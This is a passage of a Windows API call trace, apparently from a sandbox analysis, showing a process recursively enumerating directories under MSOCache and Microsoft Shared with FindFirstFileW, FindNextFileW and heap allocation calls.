ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0035.337] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.337] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5540 [0035.348] FindNextFileW (in: hFindFile=0x6f5540, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.354] FindNextFileW (in: hFindFile=0x6f5540, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0036.978] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ee0068 | out: hHeap=0x600000) returned 1 [0036.978] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f513079, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f513079, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f513079, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x9655, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.xml", cAlternateFileName="")) returned 1 [0036.978] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="numbers", cAlternateFileName="")) returned 1 [0036.978] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3ee0068 [0036.978] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*", lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3942d28 [0036.978] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.978] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="numbase.xml", cAlternateFileName="")) returned 1 [0036.978] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="numbase.xml", cAlternateFileName="")) returned 0 [0036.978] FindClose (in: hFindFile=0x3942d28 | out: hFindFile=0x3942d28) returned 1 [0036.978] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ee0068 | out: hHeap=0x600000) returned 1 [0036.979] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f79a7b7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f79a7b7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7c0915, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="numbers.xml", cAlternateFileName="")) returned 1 [0036.979] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenu", cAlternateFileName="")) returned 1 [0036.979] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3ee0068 [0036.979] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*", lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3942d28 [0036.979] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.979] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 1 [0036.979] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 0 [0036.979] FindClose (in: hFindFile=0x3942d28 | out: hFindFile=0x3942d28) returned 1 [0036.979] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ee0068 | out: hHeap=0x600000) returned 1 [0036.979] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f80cbd1, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f80cbd1, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f832d2f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0036.979] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpad", cAlternateFileName="OSKNUM~1")) returned 1 [0036.980] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3ee0068 [0036.980] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*", lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3942d28 [0036.980] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.980] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 1 [0036.980] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 0 [0036.980] FindClose (in: hFindFile=0x3942d28 | out: hFindFile=0x3942d28) returned 1 [0036.980] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ee0068 | out: hHeap=0x600000) returned 1 [0036.980] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdb3fc5, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdb3fc5, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdb3fc5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0036.980] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpred", cAlternateFileName="")) returned 1 [0036.980] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3ee0068 [0036.981] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*", lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3942d28 [0036.981] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.981] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 1 [0036.981] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 0 [0036.981] FindClose (in: hFindFile=0x3942d28 | out: hFindFile=0x3942d28) returned 1 [0036.981] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ee0068 | out: hHeap=0x600000) returned 1 [0036.981] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe00281, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe00281, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe00281, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0036.981] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbols", cAlternateFileName="")) returned 1 [0036.981] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3ee0068 [0036.981] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*", lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3942d28 [0036.981] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.981] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc0758, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1dc0758, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="ea-sym.xml", cAlternateFileName="")) returned 1 [0036.982] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp-sym.xml", cAlternateFileName="")) returned 1 [0036.982] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbase.xml", cAlternateFileName="")) returned 1 [0036.982] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x33dee18 | out: lpFindFileData=0x33dee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbase.xml", cAlternateFileName="")) returned 0 [0036.982] FindClose (in: hFindFile=0x3942d28 | out: hFindFile=0x3942d28) returned 1 [0036.982] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ee0068 | out: hHeap=0x600000) returned 1 [0036.982] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe7269b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe7269b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe7269b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0036.982] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="web", cAlternateFileName="")) returned 1 [0036.982] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3ee0068 [0037.963] FindNextFileW (in: hFindFile=0x3942ba8, lpFindFileData=0x33df310 | out: lpFindFileData=0x33df310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0037.963] FindNextFileW (in: hFindFile=0x3942ba8, lpFindFileData=0x33df310 | out: lpFindFileData=0x33df310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3fc40a8 [0037.963] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*", lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3942ce8 [0037.964] FindNextFileW (in: hFindFile=0x3942ce8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0037.964] FindNextFileW (in: hFindFile=0x3942ce8, lpFindFileData=0x33df094 | out: lpFindFileData=0x33df094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0037.964] FindClose (in: hFindFile=0x3942ce8 | out: hFindFile=0x3942ce8) returned 1 [0037.964] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fc40a8 | out: hHeap=0x600000) returned 1 